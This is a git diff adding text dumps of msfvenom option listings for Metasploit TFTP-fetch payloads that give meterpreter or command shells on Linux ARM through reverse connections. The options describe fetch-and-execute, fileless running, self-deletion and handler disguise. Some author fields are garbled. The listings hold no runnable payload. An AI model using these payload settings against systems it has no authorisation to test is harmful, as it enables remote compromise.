FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..cf23118 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uwGHmAfsFE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell-reverse_tcp.txt new file mode 100644 index 0000000..8978b06 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell-reverse_tcp.txt @@ -0,0 +1,93 @@ + + Name: TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/aarch64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME faFFztSLPkQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + dup2 socket in x12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..81c5c99 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell_reverse_tcp.txt @@ -0,0 +1,81 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/aarch64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HAVsvkXE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..62114fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armbe/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UpVReVFwhH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..a46ece0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armbe/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME saSLBWDWxZjB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..7a69a7b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PUmCCxMciM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + 